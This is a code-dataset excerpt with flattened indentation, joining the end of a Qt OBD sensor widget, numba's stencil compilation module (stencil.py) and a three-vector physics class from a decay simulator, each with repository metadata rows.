s = self.graphics.sizeHint()
self.config['w'] = s.width()
self.config['h'] = s.height()
return s
def position(self):
return QtCore.QPoint(self.config['x'], self.config['y'])
def moveEvent(self, e):
pos = e.pos()
self.config['x'] = pos.x()
self.config['y'] = pos.y()
def delete(self):
self.parent().delete_widget(self)
def mouseMoveEvent(self, e):
if e.buttons() == QtCore.Qt.LeftButton:
mimeData = QtCore.QMimeData()
mimeData.setText('%d,%d' % (e.x(), e.y()))
# show the ghost image while dragging
pixmap = QtGui.QPixmap.grabWidget(self)
painter = QtGui.QPainter(pixmap)
painter.fillRect(pixmap.rect(), QtGui.QColor(0, 0, 0, 127))
painter.end()
drag = QtGui.QDrag(self)
drag.setMimeData(mimeData)
drag.setPixmap(pixmap)
drag.setHotSpot(e.pos())
drag.exec_(QtCore.Qt.MoveAction)
def contextMenuEvent(self, e):
action = self.menu.exec_(self.mapToGlobal(e.pos()))
def get_command(self):
s = self.config["sensor"]
if s in obd.commands:
return obd.commands[s]
else:
raise KeyError("'%s' is not a valid OBDCommand" % s)
def render(self, response):
if not response.is_null():
self.graphics.render(response)
| lgpl-2.1 | 5,463,960,265,789,432,000 | 26.826531 | 82 | 0.567657 | false |
numba/numba | numba/stencils/stencil.py | 4 | 39074 | #
# Copyright (c) 2017 Intel Corporation
# SPDX-License-Identifier: BSD-2-Clause
#
import copy
import numpy as np
from llvmlite import ir as lir
from numba.core import types, typing, utils, ir, config, ir_utils, registry
from numba.core.typing.templates import (CallableTemplate, signature,
infer_global, AbstractTemplate)
from numba.core.imputils import lower_builtin
from numba.core.extending import register_jitable
from numba.misc.special import literal_unroll
import numba
import operator
from numba.np import numpy_support
class StencilFuncLowerer(object):
'''Callable class responsible for lowering calls to a specific StencilFunc.
'''
def __init__(self, sf):
self.stencilFunc = sf
def __call__(self, context, builder, sig, args):
cres = self.stencilFunc.compile_for_argtys(sig.args, {},
sig.return_type, None)
res = context.call_internal(builder, cres.fndesc, sig, args)
context.add_linking_libs([cres.library])
return res
@register_jitable
def raise_if_incompatible_array_sizes(a, *args):
ashape = a.shape
# We need literal_unroll here because the stencil might take
# multiple input arrays with different types that are not compatible
# (e.g. values as float[:] and flags as bool[:])
# When more than three total arrays are given, the second and third
# are iterated over in the loop below. Without literal_unroll, their
# types have to match.
# An example failing signature without literal_unroll might be
# (float[:], float[:], bool[:]) (Just (float[:], bool[:]) wouldn't fail)
for arg in literal_unroll(args):
if a.ndim != arg.ndim:
raise ValueError("Secondary stencil array does not have same number "
" of dimensions as the first stencil input.")
argshape = arg.shape
for i in range(len(ashape)):
if ashape[i] > argshape[i]:
raise ValueError("Secondary stencil array has some dimension "
"smaller the same dimension in the first "
"stencil input.")
def slice_addition(the_slice, addend):
""" Called by stencil in Python mode to add the loop index to a
user-specified slice.
"""
return slice(the_slice.start + addend, the_slice.stop + addend)
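# For example, slice_addition(slice(-1, 2), 5) returns slice(4, 7): the relative
# window expressed in the kernel is shifted by the absolute loop index.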
class StencilFunc(object):
"""
A special type to hold stencil information for the IR.
"""
id_counter = 0
def __init__(self, kernel_ir, mode, options):
self.id = type(self).id_counter
type(self).id_counter += 1
self.kernel_ir = kernel_ir
self.mode = mode
self.options = options
self.kws = [] # remember original kws arguments
# stencils only supported for CPU context currently
self._typingctx = registry.cpu_target.typing_context
self._targetctx = registry.cpu_target.target_context
self._typingctx.refresh()
self._targetctx.refresh()
self._install_type(self._typingctx)
self.neighborhood = self.options.get("neighborhood")
self._type_cache = {}
self._lower_me = StencilFuncLowerer(self)
def replace_return_with_setitem(self, blocks, index_vars, out_name):
"""
Find return statements in the IR and replace them with a SetItem
call of the value "returned" by the kernel into the result array.
Returns the block labels that contained return statements.
"""
ret_blocks = []
for label, block in blocks.items():
scope = block.scope
loc = block.loc
new_body = []
for stmt in block.body:
if isinstance(stmt, ir.Return):
ret_blocks.append(label)
# If 1D array then avoid the tuple construction.
if len(index_vars) == 1:
rvar = ir.Var(scope, out_name, loc)
ivar = ir.Var(scope, index_vars[0], loc)
new_body.append(ir.SetItem(rvar, ivar, stmt.value, loc))
else:
# Convert the string names of the index variables into
# ir.Var's.
var_index_vars = []
for one_var in index_vars:
index_var = ir.Var(scope, one_var, loc)
var_index_vars += [index_var]
s_index_name = ir_utils.mk_unique_var("stencil_index")
s_index_var = ir.Var(scope, s_index_name, loc)
# Build a tuple from the index ir.Var's.
tuple_call = ir.Expr.build_tuple(var_index_vars, loc)
new_body.append(ir.Assign(tuple_call, s_index_var, loc))
rvar = ir.Var(scope, out_name, loc)
# Write the return statements original value into
# the array using the tuple index.
si = ir.SetItem(rvar, s_index_var, stmt.value, loc)
new_body.append(si)
else:
new_body.append(stmt)
block.body = new_body
return ret_blocks
def add_indices_to_kernel(self, kernel, index_names, ndim,
neighborhood, standard_indexed, typemap, calltypes):
"""
Transforms the stencil kernel as specified by the user into one
that includes each dimension's index variable as part of the getitem
calls. So, in effect array[-1] becomes array[index0-1].
"""
const_dict = {}
kernel_consts = []
if config.DEBUG_ARRAY_OPT >= 1:
print("add_indices_to_kernel", ndim, neighborhood)
ir_utils.dump_blocks(kernel.blocks)
if neighborhood is None:
need_to_calc_kernel = True
else:
need_to_calc_kernel = False
if len(neighborhood) != ndim:
raise ValueError("%d dimensional neighborhood specified for %d " \
"dimensional input array" % (len(neighborhood), ndim))
tuple_table = ir_utils.get_tuple_table(kernel.blocks)
relatively_indexed = set()
for block in kernel.blocks.values():
scope = block.scope
loc = block.loc
new_body = []
for stmt in block.body:
if (isinstance(stmt, ir.Assign) and
isinstance(stmt.value, ir.Const)):
if config.DEBUG_ARRAY_OPT >= 1:
print("remembering in const_dict", stmt.target.name,
stmt.value.value)
# Remember consts for use later.
const_dict[stmt.target.name] = stmt.value.value
if ((isinstance(stmt, ir.Assign)
and isinstance(stmt.value, ir.Expr)
and stmt.value.op in ['setitem', 'static_setitem']
and stmt.value.value.name in kernel.arg_names) or
(isinstance(stmt, ir.SetItem)
and stmt.target.name in kernel.arg_names)):
raise ValueError("Assignments to arrays passed to stencil " \
"kernels is not allowed.")
if (isinstance(stmt, ir.Assign)
and isinstance(stmt.value, ir.Expr)
and stmt.value.op in ['getitem', 'static_getitem']
and stmt.value.value.name in kernel.arg_names
and stmt.value.value.name not in standard_indexed):
# We found a getitem from the input array.
if stmt.value.op == 'getitem':
stmt_index_var = stmt.value.index
else:
stmt_index_var = stmt.value.index_var
# allow static_getitem since rewrite passes are applied
#raise ValueError("Unexpected static_getitem in add_indices_to_kernel.")
relatively_indexed.add(stmt.value.value.name)
# Store the index used after looking up the variable in
# the const dictionary.
if need_to_calc_kernel:
assert hasattr(stmt_index_var, 'name')
if stmt_index_var.name in tuple_table:
kernel_consts += [tuple_table[stmt_index_var.name]]
elif stmt_index_var.name in const_dict:
kernel_consts += [const_dict[stmt_index_var.name]]
else:
raise ValueError("stencil kernel index is not "
"constant, 'neighborhood' option required")
if ndim == 1:
# Single dimension always has index variable 'index0'.
# tmpvar will hold the real index and is computed by
# adding the relative offset in stmt.value.index to
# the current absolute location in index0.
index_var = ir.Var(scope, index_names[0], loc)
tmpname = ir_utils.mk_unique_var("stencil_index")
tmpvar = ir.Var(scope, tmpname, loc)
stmt_index_var_typ = typemap[stmt_index_var.name]
# If the array is indexed with a slice then we
# have to add the index value with a call to
# slice_addition.
if isinstance(stmt_index_var_typ, types.misc.SliceType):
sa_var = ir.Var(scope, ir_utils.mk_unique_var("slice_addition"), loc)
sa_func = numba.njit(slice_addition)
sa_func_typ = types.functions.Dispatcher(sa_func)
typemap[sa_var.name] = sa_func_typ
g_sa = ir.Global("slice_addition", sa_func, loc)
new_body.append(ir.Assign(g_sa, sa_var, loc))
slice_addition_call = ir.Expr.call(sa_var, [stmt_index_var, index_var], (), loc)
calltypes[slice_addition_call] = sa_func_typ.get_call_type(self._typingctx, [stmt_index_var_typ, types.intp], {})
new_body.append(ir.Assign(slice_addition_call, tmpvar, loc))
new_body.append(ir.Assign(
ir.Expr.getitem(stmt.value.value, tmpvar, loc),
stmt.target, loc))
else:
acc_call = ir.Expr.binop(operator.add, stmt_index_var,
index_var, loc)
new_body.append(ir.Assign(acc_call, tmpvar, loc))
new_body.append(ir.Assign(
ir.Expr.getitem(stmt.value.value, tmpvar, loc),
stmt.target, loc))
else:
index_vars = []
sum_results = []
s_index_name = ir_utils.mk_unique_var("stencil_index")
s_index_var = ir.Var(scope, s_index_name, loc)
const_index_vars = []
ind_stencils = []
stmt_index_var_typ = typemap[stmt_index_var.name]
# Same idea as above but you have to extract
# individual elements out of the tuple indexing
# expression and add the corresponding index variable
# to them and then reconstitute as a tuple that can
# index the array.
for dim in range(ndim):
tmpname = ir_utils.mk_unique_var("const_index")
tmpvar = ir.Var(scope, tmpname, loc)
new_body.append(ir.Assign(ir.Const(dim, loc),
tmpvar, loc))
const_index_vars += [tmpvar]
index_var = ir.Var(scope, index_names[dim], loc)
index_vars += [index_var]
tmpname = ir_utils.mk_unique_var("ind_stencil_index")
tmpvar = ir.Var(scope, tmpname, loc)
ind_stencils += [tmpvar]
getitemname = ir_utils.mk_unique_var("getitem")
getitemvar = ir.Var(scope, getitemname, loc)
getitemcall = ir.Expr.getitem(stmt_index_var,
const_index_vars[dim], loc)
new_body.append(ir.Assign(getitemcall, getitemvar, loc))
# Get the type of this particular part of the index tuple.
if isinstance(stmt_index_var_typ, types.ConstSized):
one_index_typ = stmt_index_var_typ[dim]
else:
one_index_typ = stmt_index_var_typ[:]
# If the array is indexed with a slice then we
# have to add the index value with a call to
# slice_addition.
if isinstance(one_index_typ, types.misc.SliceType):
sa_var = ir.Var(scope, ir_utils.mk_unique_var("slice_addition"), loc)
sa_func = numba.njit(slice_addition)
sa_func_typ = types.functions.Dispatcher(sa_func)
typemap[sa_var.name] = sa_func_typ
g_sa = ir.Global("slice_addition", sa_func, loc)
new_body.append(ir.Assign(g_sa, sa_var, loc))
slice_addition_call = ir.Expr.call(sa_var, [getitemvar, index_vars[dim]], (), loc)
calltypes[slice_addition_call] = sa_func_typ.get_call_type(self._typingctx, [one_index_typ, types.intp], {})
new_body.append(ir.Assign(slice_addition_call, tmpvar, loc))
else:
acc_call = ir.Expr.binop(operator.add, getitemvar,
index_vars[dim], loc)
new_body.append(ir.Assign(acc_call, tmpvar, loc))
tuple_call = ir.Expr.build_tuple(ind_stencils, loc)
new_body.append(ir.Assign(tuple_call, s_index_var, loc))
new_body.append(ir.Assign(
ir.Expr.getitem(stmt.value.value,s_index_var,loc),
stmt.target,loc))
else:
new_body.append(stmt)
block.body = new_body
if need_to_calc_kernel:
# Find the size of the kernel by finding the maximum absolute value
# index used in the kernel specification.
neighborhood = [[0,0] for _ in range(ndim)]
if len(kernel_consts) == 0:
raise ValueError("Stencil kernel with no accesses to "
"relatively indexed arrays.")
for index in kernel_consts:
if isinstance(index, tuple) or isinstance(index, list):
for i in range(len(index)):
te = index[i]
if isinstance(te, ir.Var) and te.name in const_dict:
te = const_dict[te.name]
if isinstance(te, int):
neighborhood[i][0] = min(neighborhood[i][0], te)
neighborhood[i][1] = max(neighborhood[i][1], te)
else:
raise ValueError(
"stencil kernel index is not constant,"
"'neighborhood' option required")
index_len = len(index)
elif isinstance(index, int):
neighborhood[0][0] = min(neighborhood[0][0], index)
neighborhood[0][1] = max(neighborhood[0][1], index)
index_len = 1
else:
raise ValueError(
"Non-tuple or non-integer used as stencil index.")
if index_len != ndim:
raise ValueError(
"Stencil index does not match array dimensionality.")
return (neighborhood, relatively_indexed)
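    # Illustrative note (not part of the original source): for a 2D kernel body
    # like "return 0.25 * (a[0, 1] + a[1, 0] + a[0, -1] + a[-1, 0])", this method
    # rewrites each relative access a[i, j] into a plain getitem
    # a[index0 + i, index1 + j] using the loop index variables created by
    # _stencil_wrapper, and (when no explicit neighborhood was given) returns
    # neighborhood [[-1, 1], [-1, 1]] computed from the min/max constant offsets.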
def get_return_type(self, argtys):
if config.DEBUG_ARRAY_OPT >= 1:
print("get_return_type", argtys)
ir_utils.dump_blocks(self.kernel_ir.blocks)
if not isinstance(argtys[0], types.npytypes.Array):
raise ValueError("The first argument to a stencil kernel must "
"be the primary input array.")
from numba.core import typed_passes
typemap, return_type, calltypes, _ = typed_passes.type_inference_stage(
self._typingctx,
self._targetctx,
self.kernel_ir,
argtys,
None,
{})
if isinstance(return_type, types.npytypes.Array):
raise ValueError(
"Stencil kernel must return a scalar and not a numpy array.")
real_ret = types.npytypes.Array(return_type, argtys[0].ndim,
argtys[0].layout)
return (real_ret, typemap, calltypes)
def _install_type(self, typingctx):
"""Constructs and installs a typing class for a StencilFunc object in
the input typing context.
"""
_ty_cls = type('StencilFuncTyping_' +
str(self.id),
(AbstractTemplate,),
dict(key=self, generic=self._type_me))
typingctx.insert_user_function(self, _ty_cls)
def compile_for_argtys(self, argtys, kwtys, return_type, sigret):
# look in the type cache to find if result array is passed
(_, result, typemap, calltypes) = self._type_cache[argtys]
new_func = self._stencil_wrapper(result, sigret, return_type,
typemap, calltypes, *argtys)
return new_func
def _type_me(self, argtys, kwtys):
"""
Implement AbstractTemplate.generic() for the typing class
built by StencilFunc._install_type().
Return the call-site signature.
"""
if (self.neighborhood is not None and
len(self.neighborhood) != argtys[0].ndim):
raise ValueError("%d dimensional neighborhood specified "
"for %d dimensional input array" %
(len(self.neighborhood), argtys[0].ndim))
argtys_extra = argtys
sig_extra = ""
result = None
if 'out' in kwtys:
argtys_extra += (kwtys['out'],)
sig_extra += ", out=None"
result = kwtys['out']
if 'neighborhood' in kwtys:
argtys_extra += (kwtys['neighborhood'],)
sig_extra += ", neighborhood=None"
# look in the type cache first
if argtys_extra in self._type_cache:
(_sig, _, _, _) = self._type_cache[argtys_extra]
return _sig
(real_ret, typemap, calltypes) = self.get_return_type(argtys)
sig = signature(real_ret, *argtys_extra)
dummy_text = ("def __numba_dummy_stencil({}{}):\n pass\n".format(
",".join(self.kernel_ir.arg_names), sig_extra))
exec(dummy_text) in globals(), locals()
dummy_func = eval("__numba_dummy_stencil")
sig = sig.replace(pysig=utils.pysignature(dummy_func))
self._targetctx.insert_func_defn([(self._lower_me, self, argtys_extra)])
self._type_cache[argtys_extra] = (sig, result, typemap, calltypes)
return sig
def copy_ir_with_calltypes(self, ir, calltypes):
"""
Create a copy of a given IR along with its calltype information.
We need a copy of the calltypes because copy propagation applied
to the copied IR will change the calltypes and make subsequent
uses of the original IR invalid.
"""
copy_calltypes = {}
kernel_copy = ir.copy()
kernel_copy.blocks = {}
# For each block...
for (block_label, block) in ir.blocks.items():
new_block = copy.deepcopy(ir.blocks[block_label])
new_block.body = []
# For each statement in each block...
for stmt in ir.blocks[block_label].body:
# Copy the statement to the new copy of the kernel
# and if the original statement is in the original
# calltypes then add the type associated with this
# statement to the calltypes copy.
scopy = copy.deepcopy(stmt)
new_block.body.append(scopy)
if stmt in calltypes:
copy_calltypes[scopy] = calltypes[stmt]
kernel_copy.blocks[block_label] = new_block
return (kernel_copy, copy_calltypes)
def _stencil_wrapper(self, result, sigret, return_type, typemap, calltypes, *args):
# Overall approach:
# 1) Construct a string containing a function definition for the stencil function
# that will execute the stencil kernel. This function definition includes a
# unique stencil function name, the parameters to the stencil kernel, loop
# nests across the dimensions of the input array. Those loop nests use the
# computed stencil kernel size so as not to try to compute elements where
# elements outside the bounds of the input array would be needed.
        # 2) The body of the loop nest in this new function is a special sentinel
        #    assignment.
# 3) Get the IR of this new function.
# 4) Split the block containing the sentinel assignment and remove the sentinel
# assignment. Insert the stencil kernel IR into the stencil function IR
# after label and variable renaming of the stencil kernel IR to prevent
# conflicts with the stencil function IR.
# 5) Compile the combined stencil function IR + stencil kernel IR into existence.
# Copy the kernel so that our changes for this callsite
        # won't affect other callsites.
(kernel_copy, copy_calltypes) = self.copy_ir_with_calltypes(
self.kernel_ir, calltypes)
# The stencil kernel body becomes the body of a loop, for which args aren't needed.
ir_utils.remove_args(kernel_copy.blocks)
first_arg = kernel_copy.arg_names[0]
in_cps, out_cps = ir_utils.copy_propagate(kernel_copy.blocks, typemap)
name_var_table = ir_utils.get_name_var_table(kernel_copy.blocks)
ir_utils.apply_copy_propagate(
kernel_copy.blocks,
in_cps,
name_var_table,
typemap,
copy_calltypes)
if "out" in name_var_table:
raise ValueError("Cannot use the reserved word 'out' in stencil kernels.")
sentinel_name = ir_utils.get_unused_var_name("__sentinel__", name_var_table)
if config.DEBUG_ARRAY_OPT >= 1:
print("name_var_table", name_var_table, sentinel_name)
the_array = args[0]
if config.DEBUG_ARRAY_OPT >= 1:
print("_stencil_wrapper", return_type, return_type.dtype,
type(return_type.dtype), args)
ir_utils.dump_blocks(kernel_copy.blocks)
# We generate a Numba function to execute this stencil and here
# create the unique name of this function.
stencil_func_name = "__numba_stencil_%s_%s" % (
hex(id(the_array)).replace("-", "_"),
self.id)
# We will put a loop nest in the generated function for each
# dimension in the input array. Here we create the name for
# the index variable for each dimension. index0, index1, ...
index_vars = []
for i in range(the_array.ndim):
index_var_name = ir_utils.get_unused_var_name("index" + str(i),
name_var_table)
index_vars += [index_var_name]
# Create extra signature for out and neighborhood.
out_name = ir_utils.get_unused_var_name("out", name_var_table)
neighborhood_name = ir_utils.get_unused_var_name("neighborhood",
name_var_table)
sig_extra = ""
if result is not None:
sig_extra += ", {}=None".format(out_name)
if "neighborhood" in dict(self.kws):
sig_extra += ", {}=None".format(neighborhood_name)
# Get a list of the standard indexed array names.
standard_indexed = self.options.get("standard_indexing", [])
if first_arg in standard_indexed:
raise ValueError("The first argument to a stencil kernel must "
"use relative indexing, not standard indexing.")
if len(set(standard_indexed) - set(kernel_copy.arg_names)) != 0:
raise ValueError("Standard indexing requested for an array name "
"not present in the stencil kernel definition.")
# Add index variables to getitems in the IR to transition the accesses
# in the kernel from relative to regular Python indexing. Returns the
# computed size of the stencil kernel and a list of the relatively indexed
# arrays.
kernel_size, relatively_indexed = self.add_indices_to_kernel(
kernel_copy, index_vars, the_array.ndim,
self.neighborhood, standard_indexed, typemap, copy_calltypes)
if self.neighborhood is None:
self.neighborhood = kernel_size
if config.DEBUG_ARRAY_OPT >= 1:
print("After add_indices_to_kernel")
ir_utils.dump_blocks(kernel_copy.blocks)
# The return in the stencil kernel becomes a setitem for that
# particular point in the iteration space.
ret_blocks = self.replace_return_with_setitem(kernel_copy.blocks,
index_vars, out_name)
if config.DEBUG_ARRAY_OPT >= 1:
print("After replace_return_with_setitem", ret_blocks)
ir_utils.dump_blocks(kernel_copy.blocks)
# Start to form the new function to execute the stencil kernel.
func_text = "def {}({}{}):\n".format(stencil_func_name,
",".join(kernel_copy.arg_names), sig_extra)
# Get loop ranges for each dimension, which could be either int
# or variable. In the latter case we'll use the extra neighborhood
# argument to the function.
ranges = []
for i in range(the_array.ndim):
if isinstance(kernel_size[i][0], int):
lo = kernel_size[i][0]
hi = kernel_size[i][1]
else:
lo = "{}[{}][0]".format(neighborhood_name, i)
hi = "{}[{}][1]".format(neighborhood_name, i)
ranges.append((lo, hi))
# If there are more than one relatively indexed arrays, add a call to
# a function that will raise an error if any of the relatively indexed
# arrays are of different size than the first input array.
if len(relatively_indexed) > 1:
func_text += " raise_if_incompatible_array_sizes(" + first_arg
for other_array in relatively_indexed:
if other_array != first_arg:
func_text += "," + other_array
func_text += ")\n"
# Get the shape of the first input array.
shape_name = ir_utils.get_unused_var_name("full_shape", name_var_table)
func_text += " {} = {}.shape\n".format(shape_name, first_arg)
# If we have to allocate the output array (the out argument was not used)
        # then use numpy.full if the user specified a cval stencil decorator option
        # or np.zeros if they didn't.
if result is None:
return_type_name = numpy_support.as_dtype(
return_type.dtype).type.__name__
if "cval" in self.options:
cval = self.options["cval"]
if return_type.dtype != typing.typeof.typeof(cval):
raise ValueError(
"cval type does not match stencil return type.")
out_init ="{} = np.full({}, {}, dtype=np.{})\n".format(
out_name, shape_name, cval, return_type_name)
else:
out_init ="{} = np.zeros({}, dtype=np.{})\n".format(
out_name, shape_name, return_type_name)
func_text += " " + out_init
else: # result is present, if cval is set then use it
if "cval" in self.options:
cval = self.options["cval"]
cval_ty = typing.typeof.typeof(cval)
if not self._typingctx.can_convert(cval_ty, return_type.dtype):
msg = "cval type does not match stencil return type."
raise ValueError(msg)
out_init = "{}[:] = {}\n".format(out_name, cval)
func_text += " " + out_init
offset = 1
# Add the loop nests to the new function.
for i in range(the_array.ndim):
for j in range(offset):
func_text += " "
# ranges[i][0] is the minimum index used in the i'th dimension
            # but minimums greater than 0 don't preclude any entry in the array.
# So, take the minimum of 0 and the minimum index found in the kernel
# and this will be a negative number (potentially -0). Then, we do
# unary - on that to get the positive offset in this dimension whose
# use is precluded.
# ranges[i][1] is the maximum of 0 and the observed maximum index
# in this dimension because negative maximums would not cause us to
# preclude any entry in the array from being used.
func_text += ("for {} in range(-min(0,{}),"
"{}[{}]-max(0,{})):\n").format(
index_vars[i],
ranges[i][0],
shape_name,
i,
ranges[i][1])
offset += 1
for j in range(offset):
func_text += " "
# Put a sentinel in the code so we can locate it in the IR. We will
# remove this sentinel assignment and replace it with the IR for the
# stencil kernel body.
func_text += "{} = 0\n".format(sentinel_name)
func_text += " return {}\n".format(out_name)
if config.DEBUG_ARRAY_OPT >= 1:
print("new stencil func text")
print(func_text)
# Force the new stencil function into existence.
exec(func_text) in globals(), locals()
stencil_func = eval(stencil_func_name)
if sigret is not None:
pysig = utils.pysignature(stencil_func)
sigret.pysig = pysig
# Get the IR for the newly created stencil function.
from numba.core import compiler
stencil_ir = compiler.run_frontend(stencil_func)
ir_utils.remove_dels(stencil_ir.blocks)
# rename all variables in stencil_ir afresh
var_table = ir_utils.get_name_var_table(stencil_ir.blocks)
new_var_dict = {}
reserved_names = ([sentinel_name, out_name, neighborhood_name,
shape_name] + kernel_copy.arg_names + index_vars)
for name, var in var_table.items():
if not name in reserved_names:
new_var_dict[name] = ir_utils.mk_unique_var(name)
ir_utils.replace_var_names(stencil_ir.blocks, new_var_dict)
stencil_stub_last_label = max(stencil_ir.blocks.keys()) + 1
# Shift labels in the kernel copy so they are guaranteed unique
# and don't conflict with any labels in the stencil_ir.
kernel_copy.blocks = ir_utils.add_offset_to_labels(
kernel_copy.blocks, stencil_stub_last_label)
new_label = max(kernel_copy.blocks.keys()) + 1
# Adjust ret_blocks to account for addition of the offset.
ret_blocks = [x + stencil_stub_last_label for x in ret_blocks]
if config.DEBUG_ARRAY_OPT >= 1:
print("ret_blocks w/ offsets", ret_blocks, stencil_stub_last_label)
print("before replace sentinel stencil_ir")
ir_utils.dump_blocks(stencil_ir.blocks)
print("before replace sentinel kernel_copy")
ir_utils.dump_blocks(kernel_copy.blocks)
        # Search all the blocks in the stencil outline for the sentinel.
for label, block in stencil_ir.blocks.items():
for i, inst in enumerate(block.body):
if (isinstance( inst, ir.Assign) and
inst.target.name == sentinel_name):
# We found the sentinel assignment.
loc = inst.loc
scope = block.scope
# split block across __sentinel__
# A new block is allocated for the statements prior to the
# sentinel but the new block maintains the current block
# label.
prev_block = ir.Block(scope, loc)
prev_block.body = block.body[:i]
# The current block is used for statements after sentinel.
block.body = block.body[i + 1:]
# But the current block gets a new label.
body_first_label = min(kernel_copy.blocks.keys())
# The previous block jumps to the minimum labelled block of
# the parfor body.
prev_block.append(ir.Jump(body_first_label, loc))
# Add all the parfor loop body blocks to the gufunc
# function's IR.
for (l, b) in kernel_copy.blocks.items():
stencil_ir.blocks[l] = b
stencil_ir.blocks[new_label] = block
stencil_ir.blocks[label] = prev_block
# Add a jump from all the blocks that previously contained
# a return in the stencil kernel to the block
# containing statements after the sentinel.
for ret_block in ret_blocks:
stencil_ir.blocks[ret_block].append(
ir.Jump(new_label, loc))
break
else:
continue
break
stencil_ir.blocks = ir_utils.rename_labels(stencil_ir.blocks)
ir_utils.remove_dels(stencil_ir.blocks)
assert(isinstance(the_array, types.Type))
array_types = args
new_stencil_param_types = list(array_types)
if config.DEBUG_ARRAY_OPT >= 1:
print("new_stencil_param_types", new_stencil_param_types)
ir_utils.dump_blocks(stencil_ir.blocks)
# Compile the combined stencil function with the replaced loop
# body in it.
ir_utils.fixup_var_define_in_scope(stencil_ir.blocks)
new_func = compiler.compile_ir(
self._typingctx,
self._targetctx,
stencil_ir,
new_stencil_param_types,
None,
compiler.DEFAULT_FLAGS,
{})
return new_func
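    # Illustrative note (not part of the original source): for a 2D kernel with
    # neighborhood [[-1, 1], [-1, 1]], no 'out' argument and no cval option, the
    # generated func_text is roughly:
    #
    #     def __numba_stencil_<id>_<n>(a):
    #         full_shape = a.shape
    #         out = np.zeros(full_shape, dtype=np.float64)
    #         for index0 in range(-min(0,-1), full_shape[0]-max(0,1)):
    #             for index1 in range(-min(0,-1), full_shape[1]-max(0,1)):
    #                 __sentinel__ = 0   # later replaced by the kernel body IR
    #         return out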
def __call__(self, *args, **kwargs):
if (self.neighborhood is not None and
len(self.neighborhood) != args[0].ndim):
raise ValueError("{} dimensional neighborhood specified for {} "
"dimensional input array".format(
len(self.neighborhood), args[0].ndim))
if 'out' in kwargs:
result = kwargs['out']
rdtype = result.dtype
rttype = numpy_support.from_dtype(rdtype)
result_type = types.npytypes.Array(rttype, result.ndim,
numpy_support.map_layout(result))
array_types = tuple([typing.typeof.typeof(x) for x in args])
array_types_full = tuple([typing.typeof.typeof(x) for x in args] +
[result_type])
else:
result = None
array_types = tuple([typing.typeof.typeof(x) for x in args])
array_types_full = array_types
if config.DEBUG_ARRAY_OPT >= 1:
print("__call__", array_types, args, kwargs)
(real_ret, typemap, calltypes) = self.get_return_type(array_types)
new_func = self._stencil_wrapper(result, None, real_ret, typemap,
calltypes, *array_types_full)
if result is None:
return new_func.entry_point(*args)
else:
return new_func.entry_point(*(args+(result,)))
def stencil(func_or_mode='constant', **options):
# called on function without specifying mode style
if not isinstance(func_or_mode, str):
mode = 'constant' # default style
func = func_or_mode
else:
mode = func_or_mode
func = None
for option in options:
if option not in ["cval", "standard_indexing", "neighborhood"]:
raise ValueError("Unknown stencil option " + option)
wrapper = _stencil(mode, options)
if func is not None:
return wrapper(func)
return wrapper
def _stencil(mode, options):
if mode != 'constant':
raise ValueError("Unsupported mode style " + mode)
def decorated(func):
from numba.core import compiler
kernel_ir = compiler.run_frontend(func)
return StencilFunc(kernel_ir, mode, options)
return decorated
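# Illustrative usage sketch (not part of the original source); assumes numpy is
# available as np:
#
#     from numba import stencil
#
#     @stencil(cval=0.0)
#     def smooth(a):
#         return 0.25 * (a[0, 1] + a[1, 0] + a[0, -1] + a[-1, 0])
#
#     out = smooth(np.ones((5, 5)))   # interior points averaged, border set to cval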
@lower_builtin(stencil)
def stencil_dummy_lower(context, builder, sig, args):
"lowering for dummy stencil calls"
return lir.Constant(lir.IntType(types.intp.bitwidth), 0)
| bsd-2-clause | -9,037,071,411,355,274,000 | 46.943558 | 141 | 0.532477 | false |
ajo2eq/DecaySim | vector.py | 1 | 9251 | from __future__ import division, print_function
from math import sqrt as _sqrt, atan2 as _atan2, log as _log, pi as _pi
#Force compatibility with python 2 and 3.
try:
xrange
except NameError:
xrange = range
class VecThree(object):
"""Simple three-vector implementation. Every method for retrieving or
setting a value is implemented for both momentum and position. The
methods are interchangeable."""
def __init__(self, x=0, y=0, z=0):
self._x = x
self._y = y
self._z = z
return
def P2(self):
"""Return the squared magnitude of momentum."""
return self._x**2 + self._y**2 + self._z**2
def P(self):
"""Return the magnitude of the momentum."""
return _sqrt(self._x**2 + self._y**2 + self._z**2)
def Pt(self):
"""Return the transverse momentum of the particle."""
return _sqrt(self._x**2 + self._y**2)
def X(self):
"""Return the x-component."""
return self._x
def Px(self):
"""Return the px-component."""
return self._x
    def Y(self):
        """Return the y-component."""
        return self._y
def Py(self):
"""Return the py-component."""
return self._y
def Z(self):
"""Return the z-component."""
return self._z
def Pz(self):
"""Return the pz-component."""
return self._z
def SetX(self, x):
"""Set the x-component."""
self._x = x
def SetPx(self, x):
"""Set the x-component."""
self._x = x
def SetY(self, y):
"""Set the y-component."""
self._y = y
def SetPy(self, y):
"""Set the y-component."""
self._y = y
def SetZ(self, z):
"""Set the z-component."""
self._z = z
def SetPz(self, z):
"""Set the z-component."""
self._z = z
def Phi(self):
"""Return Phi of the particle."""
return _atan2(self._y, self._x)
def Eta(self):
"""Return pseudorapidity of the particle."""
p = _sqrt(self._x**2 + self._y**2 + self._z**2)
if (p == 0):
return 0.0
if (p == self._z and p > 0):
return 1e72
if (p == self._z and p < 0):
return -1e72
return 0.5*_log((p + self._z) / (p - self._z))
def DeltaPhi(self, v):
"""Return delta phi of it and some other particle."""
dPhi = self.Phi() - v.Phi()
if (dPhi >= _pi):
dPhi -= 2 * _pi
if (dPhi < -_pi):
dPhi += 2 * _pi
return dPhi
def DeltaEta(self, v):
"""Return delta eta of it and some other vector."""
return abs(self.Eta() - v.Eta())
def DeltaR(self, v):
"""Return delta eta of it and some other vector."""
return _sqrt(self.DeltaEta(v)**2 + self.DeltaPhi(v)**2)
def Dot3(self, v):
"""Return the dot product of it's and another vector's
positions/momenta."""
return (self.X() * v.X() + self.Y() * v.Y() + self.Z() * v.Z())
def Unit3(self):
"""Return a unit three-vector."""
mag = self.P()
return VecThree(self._x / mag,
self._y / mag,
self._z / mag)
def CosTheta(self, v):
"""Return the cosine of the angle between two vectors."""
return self.Unit3().Dot3(v.Unit3())
def __add__(self, v):
"""Return the vector sum."""
return VecThree(self.X() + v.X(), self.Y() + v.Y(), self.Z() + v.Z())
def __sub__(self, v):
"""Return the vector difference."""
return VecThree(self.X() - v.X(), self.Y() - v.Y(), self.Z() - v.Z())
def __mul__(self, v):
"""Multiply self by a scalar. This should not be used with a VecFour."""
return VecThree(self.X()*v, self.Y()*v, self.Z()*v)
def __truediv__(self, v):
"""Divide self by a scalar. This should mot be used with a VecFour."""
return VecThree(self.X()/v, self.Y()/v, self.Z()/v)
